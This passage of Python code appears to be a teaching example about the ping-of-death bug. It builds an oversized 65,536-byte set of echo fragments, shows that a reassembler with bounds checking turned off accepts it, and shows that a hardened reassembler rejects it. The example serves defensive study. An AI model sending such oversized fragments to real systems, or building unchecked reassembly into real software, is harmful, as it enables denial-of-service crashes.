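def normal_echo_request() -> bytes:
    """A 3,000-byte echo payload (constructed): three fragments, reassembles cleanly."""
    return reassemble(make_fragments(b"\x41" * 3000))

def ping_of_death_fragments():
    """Constructed PoD: 65,536 payload bytes, one more than any IPv4 datagram may hold."""
    return make_fragments(b"\x41" * 65536)

def oversized_length_without_check() -> int:
    """What the vulnerable reassembler ends up holding: more than MAX_DATAGRAM bytes."""
    return len(reassemble(ping_of_death_fragments(), check_bounds=False))

def hardened_rejects() -> bool:
    """The checked reassembler refuses the same fragments."""
    try:
        reassemble(ping_of_death_fragments())
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(len(normal_echo_request()), oversized_length_without_check(), hardened_rejects())
```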